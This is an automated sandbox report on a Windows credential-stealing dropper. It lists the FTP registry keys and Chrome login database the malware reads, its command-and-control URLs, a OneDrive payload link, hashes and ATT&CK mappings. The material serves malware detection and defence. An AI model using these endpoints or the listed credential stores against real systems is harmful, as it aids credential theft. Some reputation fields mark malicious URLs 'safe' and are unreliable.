Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 PowerShell	1 DLL Side-Loading	211 Process Injection	1 Masquerading	2 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	112 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	211 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Software Packing	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	15%	ReversingLabs	ByteCode-MSIL.Trojan.Bsymem
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	100%	Avira	HEUR/AGEN.1202504
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.0.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.ibsensoftware.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://edi4gw.db.files.1drv.com4	0%	Avira URL Cloud	safe
http://sedesadre.gq/PKZ/PWS/fre.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
l-0003.l-dc-msedge.net	13.107.43.12	true	false	unknown
sedesadre.gq	141.98.6.102	true	true	unknown
onedrive.live.com	unknown	unknown	false	high
edi4gw.db.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sedesadre.gq/PKZ/PWS/fre.php	true	Avira URL Cloud: safe	unknown
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://edi4gw.db.files.1drv.com4	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024%21128&authkey=AFWFoMk	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401922859.0000000004961000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 00000005.00000002.320847106.0000014604A13000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 00000005.00000002.321224479.0000014604A55000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://onedrive.live.com	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000002.420135572.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.320944817.0000014604A27000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Locations	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://james.newtonking.com/projects/json	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521644432.000000000327E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519732360.0000000003147000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.t	svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/jsonschema	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321064418.0000014604A3A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.nuget.org/packages/Newtonsoft.Json.Bson	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.98.6.102	sedesadre.gq	Germany		33657	CMCSUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	756117
Start date and time:	2022-11-29 16:49:18 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 29s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/9@21/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 99% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 13.107.42.13, 13.107.42.12
Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, fs.microsoft.com, l-0003.l-msedge.net, odc-web-geo.onedrive.akadns.net, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-db-files-geo.onedrive.akadns.net, odc-db-files-brs.onedrive.akadns.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Simulations

Behavior and APIs

Time	Type	Description
16:51:09	API Interceptor	68x Sleep call for process: powershell.exe modified
16:52:23	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe modified
16:52:27	API Interceptor	14x Sleep call for process: RegAsm.exe modified

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1537
Entropy (8bit):	5.3478589519339295
Encrypted:	false
SSDEEP:	48:MxHKX9HKx1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:iqX9qxwCYqhQnoPtIxHeqzNrqdq4qs
MD5:	2A63347CC5F87ABDC744C637814F0C27
SHA1:	4795E5BE85E14E9BDAACB6D00E465F238FA3601F
SHA-256:	F4DCAC81A786946BE4394916C1A88F3C2EDD30660EEC190682793293D38BB865
SHA-512:	961AD4730F9361A6067005AD63EC8828EEA2755EE60754623E0879A2635ADF20BF731900936D555D6422D87AC10318A09A750C03612D12BB2C13815D95FC110E
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.8968676994158
Encrypted:	false
SSDEEP:	96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
MD5:	36DE9155D6C265A1DE62A448F3B5B66E
SHA1:	02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
SHA-256:	8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
SHA-512:	C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15560
Entropy (8bit):	5.550696665565154
Encrypted:	false
SSDEEP:	384:pte/e27IjK12pCbvlSBxnOulrISsFvIZA/4oXIYo:LO20B4xOulrYCilo
MD5:	18C379E4374BC2337F9F0D5394A3D7A1
SHA1:	8DEBC168CDEBAF36CAD9ED9DDD69512B742372FB
SHA-256:	4DD8B586651F70808C99483D02E9D19ADB96B728A402FDA3D0DE5D29FDA0936A
SHA-512:	5D1B414DD4F10BE191E64C203706F5BE73F976C971109B39F1483A705C082280B7274CB2FD71B683E6D1DEA4577E668E516ADC4255266BC2B00DDD8254EA8137
Malicious:	false
Preview:	@...e..................... ...........'..............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_150mte30.zn5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cdh4roqr.3j3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hojog3ew.0sb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kk3bso0d.u4o.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\eb42b1a5c308fc11edf1ddbdd25c8486_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Download File

